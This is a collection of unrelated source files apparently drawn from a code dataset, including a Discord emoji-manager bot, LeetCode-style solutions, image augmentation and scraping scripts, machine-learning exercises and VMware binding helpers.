maxes[self.guild.premium_tier]\n\n def list_unloaded(self):\n loaded_names = [emoji.name for emoji in self.guild.emojis]\n return [n for n in os.listdir(f\"{EMOJI_DIR}/{self.guild.id}\") if n not in loaded_names] or ('No cached emojis',)\n\n async def clean(self):\n '''renames any emoji on the server that shares a name with an emoji on the disk or on the server'''\n return\n print(\"renaming dupes\")\n names = os.listdir(f\"{EMOJI_DIR}/{self.guild.id}\")\n for emoji in self.guild.emojis:\n if emoji.animated:\n continue\n count = 1\n name = emoji.name\n if name in names:\n while name + str(count) in names:\n count += 1\n print(\"renaming %s to %s\" % (emoji.name, emoji.name + str(count)))\n await emoji.edit(name=emoji.name + str(count))\n names.append(emoji.name)\n if len(self.guild.emojis) > self.max_emojis and False:\n print(\"caching one emoji...\")\n await self.guild.emojis[-1].delete(reason=\"cached\")\n\n async def scan(self, message):\n pattern = re.compile(r'(?:<:(?P\\w+):(?P\\d+)>)|(?::(?P\\w+):)')\n emojis = pattern.finditer(message.content)\n for emojistr in emojis:\n if emojistr.group('nameonly'):\n try:\n emoji = await self.bump_emoji(emojistr.group('nameonly'))\n except Exception as e:\n print(e)\n continue\n if not emoji:\n continue\n self.client.deletable_messages.append(message.id)\n await message.delete()\n send_message(message.channel,\n message.content.replace(':%s:' % emojistr.group('nameonly'), str(emoji)),\n username=message.author.display_name,\n avatar_url=str(message.author.avatar_url).replace('webp', 'png')\n )\n print(str(message.author.avatar_url))\n break\n\n elif emojistr.group('name'):\n emoji = discord.utils.get(self.guild.emojis, id=emojistr.group('id'), name=emojistr.group('name'))\n if emoji:\n await self.bump_emoji(emoji)\n\n async def rename_emoji(self, before, after):\n print('renamed')\n await self.clean()\n\n async def add_emoji(self, emoji):\n '''call this when an emoji is added to the server'''\n await self.clean()\n print('added ' + str(emoji))\n if emoji in self._priorities:\n # this can happen if the emoji manager is instantiated after the emoji is added\n self._priorities.remove(emoji)\n if len(self.guild.emojis) > self.max_emojis:\n await self._save(self._priorities[-1])\n await self._priorities[-1].delete(reason=\"cached\")\n print(\"inserting\")\n self._priorities.insert(0, emoji)\n\n async def bump_emoji(self, emoji):\n '''call this when an emoji is used or requested'''\n print('bumped ' + str(emoji))\n if emoji in self.guild.emojis:\n i = self._priorities.index(emoji)\n if i != 0:\n self._priorities[i] = self._priorities[i - 1]\n self._priorities[i - 1] = emoji\n else:\n image = await self._load(emoji)\n return await self.guild.create_custom_emoji(name=emoji, image=image)\n\n def del_emoji(self, emoji):\n print('deleted ' + str(emoji))\n '''call this when an emoji is deleted (even if by the manager)'''\n self._priorities.remove(emoji)\n\n def _path(self, emoji):\n try:\n return \"%s/%s/%s\" % (EMOJI_DIR, self.guild.id, emoji.name)\n except Exception:\n return \"%s/%s/%s\" % (EMOJI_DIR, self.guild.id, emoji)\n\n async def _load(self, emoji):\n print('loaded ' + str(emoji))\n f = await aiofiles.open(self._path(emoji), 'rb')\n binary = await f.read()\n await f.close()\n # os.remove(self._path(emoji))\n return binary\n\n async def _save(self, emoji):\n print('saving ' + str(emoji) + ' from ' + str(emoji.url))\n '''load all emojis in the server into memory'''\n async with aiohttp.ClientSession() as session:\n async with session.get(str(emoji.url)) as resp:\n if resp.status == 200:\n f = await aiofiles.open(self._path(emoji), mode='wb')\n await f.write(await resp.read())\n await f.close()\n else:\n print(\"API gave unexpected response (%d) emoji not saved\" % resp.status)\n\n\nclass EmojiManagerCog(commands.Cog, name=\"Emoji Manager\"):\n '''\n Can be used to hotswap extra emojis into the server when the limit is reached\n must be enabled in settings\n '''\n\n def __init__(self, bot):\n self.bot = bot\n self._managers = None\n\n @property\n def managers(self):\n self._managers = self._managers or {guild.id: emoji_manager(self.bot, guild) for guild in self.bot.guilds}\n return self._managers\n\n @property\n def guild_settings(self):\n return self.bot.get_cog('GuildSettings')\n\n @commands.command(aliases=['emotes', 'emoji', 'emote'])\n async def emojis(self, ctx):\n '''\n List currently cached emojis.\n Enclose the name (case sensitive) of cached emoji in `:`s to auto-load it into a message\n '''\n settings = self.guild_settings.get_guild(ctx.guild)\n if not settings.manage_emojis:\n message = \"The emoji manager is disabled, you can enable it in `!settings`\"\n else:\n message = '```\\n • ' + '\\n • '.join(self.managers[ctx.guild.id].list_unloaded()) + '```\\n'\n message += \"Enclose the name (case sensitive) of cached emoji in `:`s to auto-load it into a message\"\n\n await ctx.channel.send(message)\n\n @commands.Cog.listener()\n async def on_message(self, message):\n settings = self.guild_settings.get_guild(message.guild)\n if settings.manage_emojis:\n await self.managers[message.guild.id].scan(message)\n\n @commands.Cog.listener()\n async def on_guild_emojis_update(self, guild, before, after):\n settings = self.guild_settings.get_guild(guild)\n if not settings.manage_emojis:\n return\n\n if len(before) == len(after): # if renamed\n diff = [i for i in range(len(after)) if before[i].name != after[i].name and not before[i].animated]\n for i in diff:\n await self.managers[guild.id].rename_emoji(before[i], after[i])\n\n elif len(before) > len(after): # if removed\n for emoji in (emoji for emoji in before if emoji not in after and not emoji.animated):\n self.managers[guild.id].del_emoji(emoji)\n\n elif len(after) > len(before): # if added\n for emoji in (emoji for emoji in after if emoji not in before and not emoji.animated):\n await self.managers[guild.id].add_emoji(emoji)\n\n\ndef setup(bot):\n bot.add_cog(EmojiManagerCog(bot))\n","sub_path":"src/emoji_manager.py","file_name":"emoji_manager.py","file_ext":"py","file_size_in_byte":7773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"277203021","text":"\"\"\"\nGiven a binary tree, check whether it is a mirror of itself (ie, symmetric around its center).\n\nFor example, this binary tree [1,2,2,3,4,4,3] is symmetric:\n 1\n / \\\n 2 2\n / \\ / \\\n3 4 4 3\n\n\nBut the following [1,2,2,null,3,null,3] is not:\n 1\n / \\\n 2 2\n \\ \\\n 3 3\n\"\"\"\nimport collections\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.left = None\n self.right = None\n self.val = val\n\n\ndef is_symmetric(self, root):\n def is_mirror(l, r):\n if not l and not r:\n return True\n if not l or not r:\n return False\n elif l.val == r.val:\n return is_mirror(l.left, r.right) and is_mirror(l.right, r.left)\n return False\n\n return is_mirror(root, root)\n\n\ndef is_symmetric_iterative(self, root):\n # Each iteration, it checks whether two nodes are symmetric and then push (node1.left, node2.right),\n # (node1.right, node2.left) to the end of queue.\n if not root:\n return True\n\n dq = collections.deque([(root.left, root.right)],)\n node1, node2 = dq.popleft()\n while dq:\n if not node1 and not node2:\n continue\n elif not node1 or not node2:\n return False\n elif node1.val != node2.val:\n return False\n\n # node1.left and node2.right are symmetric nodes in structure\n # node1.right and node2.left are symmetric nodes in structure\n dq.append((node1.left, node2.right))\n dq.append((node1.right, node2.left))\n\n return True\n\n\ndef main():\n print(is_symmetric([1, 2, 2, 3, 4, 4, 3]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Tree/SymmetricTree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"286776032","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 8 11:58:05 2021\r\n\r\n@author: Divy\r\n\"\"\"\r\nimport random\r\nfrom scipy import ndarray\r\nimport skimage as sk\r\nfrom skimage import transform\r\nfrom skimage import util\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\nimport os.path\r\nimport skimage.io as sio\r\nfrom random import sample\r\n\r\ndef remove_data(folder_path,num_rem):\r\n files = os.listdir(folder_path)\r\n for file in sample(files,num_rem):\r\n os.remove(folder_path+file)\r\n\r\ndef augment_data(folder_path,num_files_desired):\r\n def random_rotation(image_array: ndarray):\r\n # pick a random degree of rotation between 25% on the left and 25% on the right\r\n random_degree = random.uniform(-25, 25)\r\n return sk.transform.rotate(image_array, random_degree)\r\n\r\n def horizontal_flip(image_array: ndarray):\r\n # horizontal flip doesn't need skimage, it's easy as flipping the image array of pixels !\r\n return image_array[:, ::-1]\r\n\r\n def random_noise(image):\r\n noise_list = [\"gauss\",\"s&p\",\"poisson\",\"speckle\"]\r\n noise_typ = random.choice(noise_list)\r\n if noise_typ == \"gauss\":\r\n row,col,ch= image.shape\r\n mean = 0\r\n var = 0.1\r\n sigma = var**0.5\r\n gauss = np.random.normal(mean,sigma,(row,col,ch))\r\n gauss = gauss.reshape(row,col,ch)\r\n noisy = image + gauss\r\n return noisy\r\n elif noise_typ == \"s&p\":\r\n row,col,ch = image.shape\r\n s_vs_p = 0.5\r\n amount = 0.004\r\n out = np.copy(image)\r\n # Salt mode\r\n num_salt = np.ceil(amount * image.size * s_vs_p)\r\n coords = [np.random.randint(0, i - 1, int(num_salt))\r\n for i in image.shape]\r\n out[coords] = 1\r\n \r\n # Pepper mode\r\n num_pepper = np.ceil(amount* image.size * (1. - s_vs_p))\r\n coords = [np.random.randint(0, i - 1, int(num_pepper))\r\n for i in image.shape]\r\n out[coords] = 0\r\n return out\r\n elif noise_typ == \"poisson\":\r\n vals = len(np.unique(image))\r\n vals = 2 ** np.ceil(np.log2(vals))\r\n noisy = np.random.poisson(image * vals) / float(vals)\r\n return noisy\r\n elif noise_typ ==\"speckle\":\r\n row,col,ch = image.shape\r\n gauss = np.random.randn(row,col,ch)\r\n gauss = gauss.reshape(row,col,ch) \r\n noisy = image + image * gauss\r\n return noisy\r\n \r\n path, dirs, files = next(os.walk(folder_path))\r\n images = [os.path.join(folder_path, f) for f in os.listdir(folder_path) if os.path.isfile(os.path.join(folder_path, f))]\r\n num_generated_files = 0\r\n while num_generated_files <= num_files_desired:\r\n # random image from the folder\r\n image_path = random.choice(images)\r\n # read image as an two dimensional array of pixels\r\n image_to_transform = sio.imread(image_path)\r\n num_generated_files += 1\r\n \r\n # dictionary of the transformations functions we defined earlier\r\n available_transformations = {\r\n 'rotate': random_rotation,\r\n 'noise': random_noise,\r\n 'horizontal_flip': horizontal_flip\r\n }\r\n \r\n # random num of transformations to apply\r\n num_transformations_to_apply = random.randint(1, len(available_transformations))\r\n \r\n num_transformations = 0\r\n transformed_image = None\r\n while num_transformations <= num_transformations_to_apply:\r\n # choose a random transformation to apply for a single image\r\n key = random.choice(list(available_transformations))\r\n transformed_image = available_transformations[key](image_to_transform)\r\n num_transformations += 1\r\n\r\n\r\n # define a name for our new file\r\n # print(image_path)\r\n new_file_path = '%s/augmented_image_%s.jpg' % (folder_path, num_generated_files)\r\n \r\n # write image to the disk\r\n transformed_image = transformed_image.astype(np.uint8)\r\n sk.io.imsave(new_file_path, transformed_image)\r\n\r\n \r\n \r\n \r\n\r\nparent_folder_path = \"Data1H(with-noise)\"\r\npath, dirss, files = next(os.walk(parent_folder_path))\r\ntotal_files_req = 800\r\nfor s in dirss:\r\n folder_path = f\"{parent_folder_path}/{s}/\"\r\n # print(folder_path)\r\n path, dirs, files = next(os.walk(folder_path))\r\n file_count = len(files)\r\n if file_count > total_files_req:\r\n num_rem = file_count - total_files_req\r\n remove_data(folder_path, num_rem)\r\n elif file_count < total_files_req:\r\n num_files_desired = total_files_req-file_count-1\r\n augment_data(folder_path,num_files_desired)","sub_path":"data_aug_rem.py","file_name":"data_aug_rem.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143717482","text":"from urllib import request\nimport re\nfrom os import fork\n\n\ndef get_file(url,fname):\n html=request.urlopen(url)\n with open(fname,'wb') as fobj:\n while True:\n data=html.read(1024)\n if not data:\n break\n fobj.write(data)\n\ndef get_urls(patt,fname,charset='utf8'):\n url_list=[]\n cpatt=re.compile(patt)\n with open(fname, encoding=charset) as fobj:\n for line in fobj:\n m = cpatt.search(line)\n if m:\n url_list.append(m.group())\n\n return url_list\n\nif __name__ == '__main__':\n url_163=\"http://www.163.com\"\n fname_163=\"/tmp/163.html\"\n get_file(url_163,fname_163)\n img_patt=\"(http|https)://[\\w./]+\\.(jpg|jpeg|gif|png)\"\n ulist = get_urls(img_patt,fname_163,'GBK')\n # print(ulist)\n for img in ulist:\n imgname=re.split('/',img)[-1]\n get_file(img,\"/tmp/img/\"+imgname)\n # print(imgname)\n # pid=fork()\n","sub_path":"n3_devops/day03/no1_get_163img.py","file_name":"no1_get_163img.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"241591532","text":"#!/usr/bin/env python\nimport requests\nimport os, sys\n\nsys.path.append(\"..\")\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", 'project.settings')\n\nfrom app.models import Genre\n\nresponse = requests.get('https://freemusicarchive.org/api/get/genres.json?api_key=OVKCLNSMSGB35I89&limit=170')\n\nresponse_dict = response. json()\n\nfor data in response_dict['dataset']:\n new_genre, created = Genre.objects.get_or_create(genre_id=data['genre_id'])\n new_genre.genre_title = data['genre_title']\n new_genre.genre_handle = data['genre_handle']\n new_genre.genre_parent_id = data['genre_parent_id']\n\n new_genre.save()\n","sub_path":"scripts/genre_populator.py","file_name":"genre_populator.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"86830602","text":"#%%\nimport pandas as pd\nimport numpy as np\ndf = pd.read_csv(r'C:\\Users\\pankaj.sanwal\\Desktop\\PythonStuff\\Python-Data-Science-and-Machine-Learning-Bootcamp\\Python-Data-Science-and-Machine-Learning-Bootcamp\\Machine Learning Sections\\Decision-Trees-and-Random-Forests\\loan_data.csv')\ndf.head(200)\n#%%\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\nplt.figure(figsize=(15,10))\n#%%\nsns.countplot(df['purpose'], hue=df['not.fully.paid'])\n#%%\nsns.countplot(df['not.fully.paid'])\n#%%\nsns.distplot(df[df['credit.policy']==1]['fico'],bins=30,kde=False,label='credit.policy=1')\nsns.distplot(df[df['credit.policy']==0]['fico'],bins=30,kde=False,label='credit.policy=0')\nplt.legend()\n#%%\nsns.distplot(df[df['not.fully.paid']==1]['fico'],bins=30,kde=False,label='not.fully.paid=1')\nsns.distplot(df[df['not.fully.paid']==0]['fico'],bins=30,kde=False,label='not.fully.paid=0')\nplt.legend()\n#%%\nsns.jointplot(df['fico'],df['int.rate'])\n#%%\nsns.lmplot(data=df,x='fico',y='int.rate',hue='credit.policy',col='not.fully.paid')\n#%%\nfinal_data = pd.get_dummies(data=df,columns=['purpose'],drop_first=True)\nfinal_data.info()\n#%%\nfrom sklearn.model_selection import train_test_split\nx=final_data.drop('not.fully.paid',axis=1)\ny=final_data['not.fully.paid']\nx_train,x_test, y_train, y_test = train_test_split(x,y,test_size=0.3,random_state=101)\n#%%\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import classification_report, confusion_matrix\ndt = DecisionTreeClassifier()\ndt.fit(x_train,y_train)\ndt_preditc = dt.predict(x_test)\n#%%\nprint(classification_report(y_test,dt_preditc))\n#%%\nprint(confusion_matrix(y_test,dt_preditc))\n#%%\nrf = RandomForestClassifier(n_estimators=200)\nrf.fit(x_train,y_train)\nrf_predict = rf.predict(x_test)\n#%%\nprint(classification_report(y_test,rf_predict))\n#%%\nprint(confusion_matrix(y_test,rf_predict))\n\n\n\n\n\n","sub_path":"ML_Algos/DT_RF_Exercise.py","file_name":"DT_RF_Exercise.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"41375901","text":"# Given an array of integers, every element appears twice except for one.\n# Implement a program that will print that single one.\n\n# Example: [1,1,2,2,3,3,4,5,5,6,6,7,7] - 4 would be the odd man out\n\n# Note:\n# Your algorithm should have a linear runtime complexity.\n\n\n# *** your code here ***\ntest = [1,2,1,2,3,7,3,5,5,6,7,4,6]\n\ndef singler(arr):\n arr.sort()\n while (arr[len(arr) - 1] == arr[len(arr) - 2]):\n arr.pop()\n arr.pop()\n print(arr[len(arr)-1], \" is the loneliest number\")\nsingler(test)\n","sub_path":"single_one.py","file_name":"single_one.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"263731534","text":"\"\"\"\nBindings common module that contains common code for skeletons and stubs\n\"\"\"\n__author__ = 'VMware, Inc.'\n__copyright__ = 'Copyright 2015 VMware, Inc. All rights reserved. -- VMware Confidential' # pylint: disable=line-too-long\n\n\nfrom vmware.vapi.exception import CoreException\n\n\ndef raise_core_exception(msg_list):\n \"\"\"\n Create and raise a CoreException from a list of messages\n\n :type msg_list: :class:`vmware.vapi.message.Message`\n :param msg_list: List of messages\n\n :raise: CoreException if msg list is not empty\n \"\"\"\n exception = None\n if msg_list:\n for msg in reversed(msg_list):\n if exception:\n exception = CoreException(msg, cause=exception)\n else:\n exception = CoreException(msg)\n if exception is not None:\n raise exception # pylint: disable-msg=E0702\n\n\nclass NameToTypeResolver(object):\n \"\"\"\n Helper class that resolves a fully qualified canonical type name to a type\n descriptor. The type name can be a structure name or an error name.\n \"\"\"\n def __init__(self, type_map):\n \"\"\"\n Initialize NameToTypeResolver\n\n :type type_map: :class:`dict` of :class:`str` and :class:`VapiStruct`\n :param type_map: Type map that contains the canonical names and the\n references to the binding classes for these types.\n \"\"\"\n self._type_map = type_map\n\n def resolve(self, name):\n \"\"\"\n Type name to be resolved\n \"\"\"\n return self._type_map.get(name)\n","sub_path":"alexa-program/vmware/vapi/bindings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"342578108","text":"from typing import List\n\n\nclass Solution:\n def numEnclaves(self, A: List[List[int]]) -> int:\n m, n = len(A), len(A[0])\n szs = [1 for _ in range(m * n)]\n ids = [i for i in range(m * n)]\n\n def find(var1):\n if ids[var1] == var1:\n return var1\n return find(ids[var1])\n\n def union(v1, v2):\n i1, i2 = find(v1), find(v2)\n big, small = (i1, i2) if szs[i1] > szs[i2] else (i2, i1)\n szs[big] += szs[small]\n ids[small] = ids[big]\n\n def idof(i, j):\n nonlocal m, n\n return i * n + j\n\n visited = set()\n\n def isvalid(i, j):\n nonlocal m, n\n return 0 <= i < m and 0 <= j < n and A[i][j] == 1 and (i, j) not in visited\n\n ds = [(0, 1), (0, -1), (1, 0), (-1, 0)]\n def helper(i, j):\n nonlocal m, n\n if not isvalid(i, j):\n return\n visited.add((i, j))\n for d in ds:\n ni, nj = d[0] + i, d[1] + j\n if isvalid(ni, nj):\n union(idof(i, j), idof(ni, nj))\n helper(ni, nj)\n\n for i in range(m):\n helper(i, 0)\n helper(i, n - 1)\n\n for i in range(n):\n helper(0, i)\n helper(m - 1, i)\n\n tot = 0\n for i in range(m):\n for j in range(n):\n tot += 1 if A[i][j] == 1 else 0\n\n return tot - len(visited)\n","sub_path":"src/graph/unionfind/lc1020.py","file_name":"lc1020.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156336218","text":"\n\nfrom xai.brain.wordbase.adjectives._marsupial import _MARSUPIAL\n\n#calss header\nclass _MARSUPIALS(_MARSUPIAL, ):\n\tdef __init__(self,): \n\t\t_MARSUPIAL.__init__(self)\n\t\tself.name = \"MARSUPIALS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"marsupial\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_marsupials.py","file_name":"_marsupials.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"2655769","text":"from __future__ import print_function\nimport tensorflow as tf\nimport numpy as np\n\nx_data = np.random.rand(100).astype(np.float32)\ny_data = x_data*0.1 + 0.3\n\n### create tensorflow structure start ###\nWeights = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\nbiases = tf.Variable(tf.zeros([1]))\ny = Weights*x_data + biases \t\t\n\n### how to optimize result by Gradient under learning rate\nloss = tf.reduce_mean(tf.square(y-y_data))\t\t# this is a number\noptimizer = tf.train.GradientDescentOptimizer(0.5)\t\t# this is a optimizer\ntrain = optimizer.minimize(loss)\t\t# train is handler of this minimize function\n\n### create tensorflow structure end ###\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\nfor step in range(201):\n sess.run(train)\n if step % 10 == 0:\n print(step, sess.run(Weights), sess.run(biases))\nsess.close() \n","sub_path":"tutorial_moFan/simple_version/Lecture5.py","file_name":"Lecture5.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"88839442","text":"'''\n题目:一个数如果恰好等于它的因子之和,这个数就称为\"完数\"。\n例如6=1+2+3.编程找出1000以内的所有完数。\n因子:所有的因数\n'''\nfor i in range(2,1000):\n l = []\n s = 0\n for j in range(1,i):\n if (i % j == 0):\n l.append(j)\n if l: # 不为空\n for k in l:\n s += k\n if (s == i):\n print(i)\n for m in l:\n print(\"%d \" % m,end=\"\")\n print()\n","sub_path":"python100例/16_求完数.py","file_name":"16_求完数.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"494191509","text":"#-*-coding:utf-8-*-\n\nimport sklearn.metrics\nimport cv2\nimport time\nimport os\n\n\nfrom lib.core.utils.torch_utils import EMA\nfrom train_config import config as cfg\n#from lib.dataset.dataietr import DataIter\n\nimport sklearn.metrics\nfrom lib.helper.logger import logger\n\nfrom lib.core.model.ShuffleNet_Series.ShuffleNetV2.utils import accuracy, AvgrageMeter, CrossEntropyLabelSmooth, save_checkpoint, get_lastest_model, get_parameters\nfrom lib.core.model.loss.focal_loss import FocalLoss,FocalLoss4d\nfrom lib.core.base_trainer.model import Net\n\nimport random\n\nfrom lib.core.base_trainer.metric import *\nimport torch\nimport torch.nn.functional as F\n\nfrom torchcontrib.optim import SWA\n\n\nfrom lib.core.model.mix.mix import cutmix,cutmix_criterion\n\n\n\nif cfg.TRAIN.mix_precision:\n from apex import amp\n\nclass Train(object):\n \"\"\"Train class.\n \"\"\"\n\n def __init__(self,train_ds,val_ds,fold):\n self.fold=fold\n\n self.init_lr=cfg.TRAIN.init_lr\n self.warup_step=cfg.TRAIN.warmup_step\n self.epochs = cfg.TRAIN.epoch\n self.batch_size = cfg.TRAIN.batch_size\n self.l2_regularization=cfg.TRAIN.weight_decay_factor\n\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else 'cpu')\n\n\n self.model = Net().to(self.device)\n\n self.load_weight()\n\n param_optimizer = list(self.model.named_parameters())\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': cfg.TRAIN.weight_decay_factor},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n\n if 'Adamw' in cfg.TRAIN.opt:\n\n self.optimizer = torch.optim.AdamW(self.model.parameters(),\n lr=self.init_lr,eps=1.e-5)\n else:\n self.optimizer = torch.optim.SGD(self.model.parameters(),\n lr=0.001,\n momentum=0.9)\n\n if cfg.TRAIN.SWA>0:\n ##use swa\n self.optimizer = SWA(self.optimizer)\n\n if cfg.TRAIN.mix_precision:\n self.model, self.optimizer = amp.initialize( self.model, self.optimizer, opt_level=\"O1\")\n\n\n self.ema = EMA(self.model, 0.999)\n\n self.ema.register()\n ###control vars\n self.iter_num=0\n\n self.train_ds=train_ds\n\n self.val_ds = val_ds\n\n # self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer,mode='max', patience=3,verbose=True)\n self.scheduler = torch.optim.lr_scheduler.CosineAnnealingLR( self.optimizer, self.epochs,eta_min=1.e-6)\n\n self.criterion = nn.BCEWithLogitsLoss().to(self.device)\n\n\n def custom_loop(self):\n \"\"\"Custom training and testing loop.\n Args:\n train_dist_dataset: Training dataset created using strategy.\n test_dist_dataset: Testing dataset created using strategy.\n strategy: Distribution strategy.\n Returns:\n train_loss, train_accuracy, test_loss, test_accuracy\n \"\"\"\n\n def distributed_train_epoch(epoch_num):\n\n summary_loss = AverageMeter()\n acc_score= ACCMeter()\n self.model.train()\n\n if cfg.MODEL.freeze_bn:\n for m in self.model.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n if cfg.MODEL.freeze_bn_affine:\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n for step in range(self.train_ds.size):\n\n if epoch_num<10:\n ###excute warm up in the first epoch\n if self.warup_step>0:\n if self.iter_num < self.warup_step:\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = self.iter_num / float(self.warup_step) * self.init_lr\n lr = param_group['lr']\n\n logger.info('warm up with learning rate: [%f]' % (lr))\n\n start=time.time()\n\n images,data, target = self.train_ds()\n images = torch.from_numpy(images).to(self.device).float()\n data = torch.from_numpy(data).to(self.device).float()\n target = torch.from_numpy(target).to(self.device).float()\n\n batch_size = data.shape[0]\n\n output = self.model(images,data)\n\n current_loss = self.criterion(output, target)\n\n summary_loss.update(current_loss.detach().item(), batch_size)\n acc_score.update(target,output)\n self.optimizer.zero_grad()\n\n if cfg.TRAIN.mix_precision:\n with amp.scale_loss(current_loss, self.optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n current_loss.backward()\n\n self.optimizer.step()\n if cfg.MODEL.ema:\n self.ema.update()\n self.iter_num+=1\n time_cost_per_batch=time.time()-start\n\n images_per_sec=cfg.TRAIN.batch_size/time_cost_per_batch\n\n\n if self.iter_num%cfg.TRAIN.log_interval==0:\n\n log_message = '[fold %d], '\\\n 'Train Step %d, ' \\\n 'summary_loss: %.6f, ' \\\n 'accuracy: %.6f, ' \\\n 'time: %.6f, '\\\n 'speed %d images/persec'% (\n self.fold,\n step,\n summary_loss.avg,\n acc_score.avg,\n time.time() - start,\n images_per_sec)\n logger.info(log_message)\n\n\n\n if cfg.TRAIN.SWA>0 and epoch_num>=cfg.TRAIN.SWA:\n self.optimizer.update_swa()\n\n return summary_loss,acc_score\n def distributed_test_epoch(epoch_num):\n summary_loss = AverageMeter()\n acc_score= ACCMeter()\n\n self.model.eval()\n t = time.time()\n with torch.no_grad():\n for step in range(self.val_ds.size):\n images, data, target = self.train_ds()\n images = torch.from_numpy(images).to(self.device).float()\n data = torch.from_numpy(data).to(self.device).float()\n target = torch.from_numpy(target).to(self.device).float()\n batch_size = data.shape[0]\n\n\n output = self.model(images,data)\n loss = self.criterion(output, target)\n\n summary_loss.update(loss.detach().item(), batch_size)\n acc_score.update(target, output)\n\n\n\n if step % cfg.TRAIN.log_interval == 0:\n\n log_message = '[fold %d], '\\\n 'Val Step %d, ' \\\n 'summary_loss: %.6f, ' \\\n 'acc: %.6f, ' \\\n 'time: %.6f' % (\n self.fold,step, summary_loss.avg, acc_score.avg, time.time() - t)\n\n logger.info(log_message)\n\n\n return summary_loss,acc_score\n\n for epoch in range(self.epochs):\n\n for param_group in self.optimizer.param_groups:\n lr=param_group['lr']\n logger.info('learning rate: [%f]' %(lr))\n t=time.time()\n\n summary_loss,acc_score = distributed_train_epoch(epoch)\n\n train_epoch_log_message = '[fold %d], '\\\n '[RESULT]: Train. Epoch: %d,' \\\n ' summary_loss: %.5f,' \\\n ' acuracy: %.5f,' \\\n ' time:%.5f' % (\n self.fold,epoch, summary_loss.avg,acc_score.avg, (time.time() - t))\n logger.info(train_epoch_log_message)\n\n if cfg.TRAIN.SWA > 0 and epoch >=cfg.TRAIN.SWA:\n\n ###switch to avg model\n self.optimizer.swap_swa_sgd()\n\n\n ##switch eam weighta\n if cfg.MODEL.ema:\n self.ema.apply_shadow()\n\n if epoch%cfg.TRAIN.test_interval==0:\n\n summary_loss,acc_score = distributed_test_epoch(epoch)\n\n val_epoch_log_message = '[fold %d], '\\\n '[RESULT]: VAL. Epoch: %d,' \\\n ' summary_loss: %.5f,' \\\n ' accuracy: %.5f,' \\\n ' time:%.5f' % (\n self.fold,epoch, summary_loss.avg,acc_score.avg, (time.time() - t))\n logger.info(val_epoch_log_message)\n\n self.scheduler.step()\n # self.scheduler.step(final_scores.avg)\n\n\n\n #### save model\n if not os.access(cfg.MODEL.model_path, os.F_OK):\n os.mkdir(cfg.MODEL.model_path)\n ###save the best auc model\n\n #### save the model every end of epoch\n current_model_saved_name='./models/fold%d_epoch_%d_val_loss%.6f.pth'%(self.fold,epoch,summary_loss.avg)\n\n logger.info('A model saved to %s' % current_model_saved_name)\n torch.save(self.model.state_dict(),current_model_saved_name)\n\n ####switch back\n if cfg.MODEL.ema:\n self.ema.restore()\n\n\n # save_checkpoint({\n # 'state_dict': self.model.state_dict(),\n # },iters=epoch,tag=current_model_saved_name)\n\n if cfg.TRAIN.SWA > 0 and epoch > cfg.TRAIN.SWA:\n ###switch back to plain model to train next epoch\n self.optimizer.swap_swa_sgd()\n\n\n\n\n def load_weight(self):\n if cfg.MODEL.pretrained_model is not None:\n state_dict=torch.load(cfg.MODEL.pretrained_model, map_location=self.device)\n self.model.load_state_dict(state_dict,strict=False)\n\n\n\n","sub_path":"net_work.py","file_name":"net_work.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"608601835","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # User Defined Function\n# \n# * To create the function use def keyword followed by function name and () and colon\n# \n# * Define it with indent\n# \n# ### Example\n\n# In[1]:\n\n\ndef square(x):\n 